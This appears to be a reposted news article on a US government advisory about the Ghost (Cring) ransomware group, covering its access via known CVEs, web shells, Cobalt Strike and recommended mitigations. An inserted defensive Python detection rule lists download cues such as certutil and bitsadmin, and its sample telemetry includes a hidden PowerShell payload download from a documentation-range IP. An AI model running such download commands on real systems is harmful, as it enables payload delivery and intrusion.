Source: www.infosecurity-magazine.com
The US authorities have released new details of the long-running “Ghost” ransomware group originating in China, claiming it has compromised victim organizations in over 70 countries.
The advisory was issued by the FBI, Cybersecurity and Infrastructure Security Agency (CISA) and the Multi-State Information Sharing and Analysis Center (MS-ISAC), and features new indicators of compromise (IOCs) and tactics, techniques and procedures (TTPs).
Also known as Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada and Rapture, the financially motivated group is unusual in hailing from China, given that most ransomware actors are located in former Soviet states.
However, in other ways it shares many similarities with the rest of the ransomware underground.
Initial access is usually obtained by exploiting known vulnerabilities in public-facing systems, such as Fortinet FortiOS appliances, and servers running Adobe ColdFusion, Microsoft SharePoint and Microsoft Exchange.
“Ghost actors have been observed uploading a web shell to a compromised server and leveraging Windows Command Prompt and/or PowerShell to download and execute Cobalt Strike Beacon malware that is then implanted on victim systems,” the report noted.
“Persistence is not a major focus for Ghost actors, as they typically only spend a few days on victim networks. In multiple instances, they have been observed proceeding from initial compromise to the deployment of ransomware within the same day.”
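The web shell to Command Prompt/PowerShell download chain quoted above is the step a process-creation rule can catch: a web server worker should not be spawning a shell that fetches a remote payload. The following is an added example, not from the advisory or this article; the event format, the worker and shell name lists, the download cues and the sample records are all constructed.

```python
import re
from dataclasses import dataclass
from typing import Iterable, Iterator, Optional
# Constructed lists: web server worker images a web shell would execute under,
# and the command interpreters the advisory says were launched from them.
WEB_WORKERS = {"w3wp.exe", "httpd.exe", "nginx.exe", "java.exe", "coldfusion.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Command-line cues for fetching a remote payload (case-insensitive).
DOWNLOAD_CUES = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|\bcurl\b|\bwget\b"
    r"|certutil.*-urlcache|bitsadmin.*/transfer|start-bitstransfer",
    re.IGNORECASE,
)
@dataclass
class ProcEvent:
    """One process-creation record (constructed format, Sysmon-like fields)."""
    host: str
    parent_image: str
    image: str
    cmdline: str

def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def classify(ev: ProcEvent) -> Optional[str]:
    """Label a web-worker -> shell spawn, or return None when the rule does not fire."""
    if _basename(ev.parent_image) not in WEB_WORKERS or _basename(ev.image) not in SHELLS:
        return None
    if DOWNLOAD_CUES.search(ev.cmdline):
        return "webshell_download"  # shell under a web worker pulling a payload
    return "webshell_shell"         # shell under a web worker, no download cue

def scan(events: Iterable[ProcEvent]) -> Iterator[tuple]:
    """Yield (host, label, cmdline) for every event the rule fires on."""
    for ev in events:
        label = classify(ev)
        if label:
            yield ev.host, label, ev.cmdline

# Constructed sample telemetry, not real IoCs (203.0.113.0/24 is a documentation range).
SAMPLE = [
    ProcEvent("web01", r"C:\Windows\System32\inetsrv\w3wp.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -nop -w hidden Invoke-WebRequest http://203.0.113.10/b -OutFile C:\Windows\Temp\b.exe"),
    ProcEvent("web01", r"C:\Windows\System32\inetsrv\w3wp.exe", r"C:\Windows\System32\cmd.exe", "cmd /c whoami"),
    ProcEvent("app02", r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd /c curl http://203.0.113.10/b"),
]

if __name__ == "__main__":
    for h, l, c in scan(SAMPLE): print(f"{h} {l}: {c}")
```

The first sample fires as `webshell_download`, the second as `webshell_shell` (a shell under the web worker still deserves a look even without a download cue), and the third does not fire because the parent is not a web worker.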
The group uses Cobalt Strike and various open-source tools for privilege escalation, and relies on Cobalt Strike again for credential access, domain account discovery, lateral movement and command and control (C2).
The tool is also deployed to list which anti-malware systems are running on a victim machine, in order to disable them, the report explained.
“Ghost ransom notes often claim exfiltrated data will be sold if a ransom is not paid,” the advisory added. “However, Ghost actors do not frequently exfiltrate a significant amount of information or files, such as intellectual property or personally identifiable information (PII), that would cause significant harm to victims if leaked.”
It Pays to Enhance Baseline Security
The group appears to go after the low-hanging fruit, often abandoning attacks when confronted with hardened systems and network segmentation that prevents lateral movement, the report noted.
That may explain why a large number of its victims are purportedly SMBs, as well as critical infrastructure providers, schools and universities, healthcare organizations, government bodies, religious institutions, and technology and manufacturing companies.
CISA urged organizations to mitigate the threat from Ghost by:
- Regularly backing up and storing backups separately from source systems
- Patching known vulnerabilities in a timely, risk-based manner, especially CVE-2018-13379, CVE-2010-2861, CVE-2009-3960, CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207
- Segmenting networks to restrict lateral movement
- Deploying phishing-resistant multi-factor authentication (MFA) for all privileged and email services accounts
Original Post URL: https://www.infosecurity-magazine.com/news/cisa-fbi-warn-global-threat-ghost/